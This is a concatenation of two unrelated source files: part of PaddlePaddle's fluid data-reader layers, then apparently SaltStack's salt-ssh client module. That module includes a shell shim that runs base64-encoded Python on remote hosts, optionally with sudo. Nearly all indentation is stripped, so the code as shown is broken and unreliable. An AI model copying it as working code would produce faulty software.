'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
:api_attr: Static Graph
The OP creates a Python reader for data feeding in Python; it is similar
to :ref:`api_fluid_layers_py_reader` except that it can read data from
the list of feed variables.
Parameters:
capacity (int): The buffer capacity maintained by :code:`py_reader`. Its unit
is batch number. Set larger :attr:`capacity` if the reader is fast.
feed_list (list(Variable)): The feed variables, usually created by
:code:`fluid.data()`.
name (str, optional): Normally there is no need for the user to set this property.
For more information, please refer to :ref:`api_guide_Name`. Default: None.
use_double_buffer (bool, optional): Whether to use double buffering. If it's True,
the OP will prefetch the next batch of data asynchronously. Default: True.
Returns:
Reader: A Reader for data feeding. The data types of read data are the same as the data types of variables of :attr:`feed_list`.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(img, label):
# User defined network. Here a simple regression as an example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
MEMORY_OPT = False
USE_CUDA = False
image = fluid.data(name='image', shape=[None, 1, 28, 28], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # The definition of custom network and the loss function
place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
build_strategy = fluid.BuildStrategy()
build_strategy.memory_optimize = True if MEMORY_OPT else False
exec_strategy = fluid.ExecutionStrategy()
compiled_prog = fluid.compiler.CompiledProgram(
fluid.default_main_program()).with_data_parallel(
loss_name=loss.name,
build_strategy=build_strategy,
exec_strategy=exec_strategy)
for epoch_id in range(2):
reader.start()
try:
while True:
exe.run(compiled_prog, fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
logging.warning(
'paddle.fluid.layers.create_py_reader_by_data() may be deprecated in the near future. '
'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The Reader class contains DecoratedReader and FileReader; DecoratedReader is inherited by CustomReader and BufferedReader, and this function is related to BufferedReader. The data will be copied to the target place through a double buffer queue. If the target place is None, the place the executor runs on will be used.
Args:
reader (Variable): The reader variable to be wrapped.
place (Place, optional): The place the data is copied to, such as CPU or GPU; if GPU is used, it is necessary to indicate which card is involved. Default is the place the executor runs on.
name (str, optional): Variable name. Normally there is no need for the user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Variable(Reader): The wrapped reader with double buffering.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
use_double_buffer=False)
reader = fluid.layers.double_buffer(reader)
image, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def read_file(reader):
"""
:api_attr: Static Graph
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()`.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read from the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
image, label = fluid.layers.read_file(reader)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
def load(out, file_path, load_as_fp16=None):
"""
The load operator loads a LoDTensor / SelectedRows variable from a disk file.
Args:
out(Variable): The LoDTensor / SelectedRows to be loaded.
file_path(STRING): The path of the file from which the variable will be loaded.
load_as_fp16(BOOLEAN): If true, the tensor will be first loaded and then converted to float16 data type. Otherwise, the tensor will be loaded directly without data type conversion. Default is False.
Returns:
None
Examples:
.. code-block:: python
import paddle.fluid as fluid
tmp_tensor = fluid.layers.create_tensor(dtype='float32')
fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, outputs={"Out": out}, attrs=attrs)
|
__init__.py
|
"""
Create ssh executor system
"""
# Import python libs
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log
import salt.minion
# Import salt libs
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
from salt.utils.platform import is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossible to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note: the list-comprehension syntax used to define SSH_SH_SHIM is needed
# so the string can be written with indentation for readability while
# still stripping the whitespace for compactness and avoiding indentation
# errors in the embedded multi-line python code
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
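# Illustrative sketch (hypothetical helper, not part of salt): the METHODOLOGY
# notes above describe two formatting passes over the shim.  The first pass
# (static values such as EX_THIN_PYTHON_INVALID) already happened when
# SSH_SH_SHIM was built; the second, instance-specific pass mirrors what
# ``Single._cmd_str`` does and is sketched below.
def _demo_format_shim(py_code_enc, debug="", sudo="", sudo_user="", set_path=""):
    # ``py_code_enc`` is the base64-encoded SSH_PY_SHIM payload; the remaining
    # placeholders enable shim debugging, sudo, and PATH overrides on the target.
    return SSH_SH_SHIM.format(
        DEBUG=debug,
        SUDO=sudo,
        SUDO_USER=sudo_user,
        SSH_PY_CODE=py_code_enc,
        SET_PATH=set_path,
    )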
if not is_windows():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
SSH_PY_SHIM = ssh_py_shim.read()
log = logging.getLogger(__name__)
class SSH:
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg="No ssh binary found in path -- ssh must be installed for salt-ssh to run. Exiting.",
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate keys.\n\n"
"You can probably resolve this by executing this script with "
"increased permissions via sudo or by running as root.\n"
"You could also use the '-c' option to supply a configuration "
"directory that you have permissions to read and write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.serial = salt.payload.Serial(opts)
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
python2_bin=self.opts["python2_bin"],
python3_bin=self.opts["python3_bin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read the roster file, caching its parsed data keyed by the roster filename.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figure out whether the target is a reachable host without wildcards, and expand it if needed.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
if hostname in [host_id, roster_data[host_id].get("host")]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n host: '
"{hostname}\n user: {user}"
"\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=self.opts.get("tgt", ""),
user=self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host {} has been added to the roster {}".format(
self.opts.get("tgt", ""), roster_file
)
)
else:
log.error("Unable to update roster {}: access denied".format(roster_file))
def _update_targets(self):
"""
Update targets in case a hostname was passed directly without the roster.
:return:
"""
hostname = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
(
"Permission denied for host {}, do you want to deploy "
"the salt-ssh key? (password required):"
).format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {}@{}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
stdout, stderr, retcode = single.run()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = "Please contact sales@saltstack.com for access to the enterprise saltwinshell module."
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
routine = Process(target=self.handle_routine, args=args)
routine.start()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
# This bare exception is here to catch spurious exceptions
# thrown by que.get during healthy operation. Please do not
# worry about this bare exception; it is entirely here to
# control program flow.
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
pass
if host not in returned:
error = (
"Target '{}' did not return any data, "
"probably due to an error."
).format(host)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(iter(ret.keys()))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(iter(ret.keys()))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, str):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
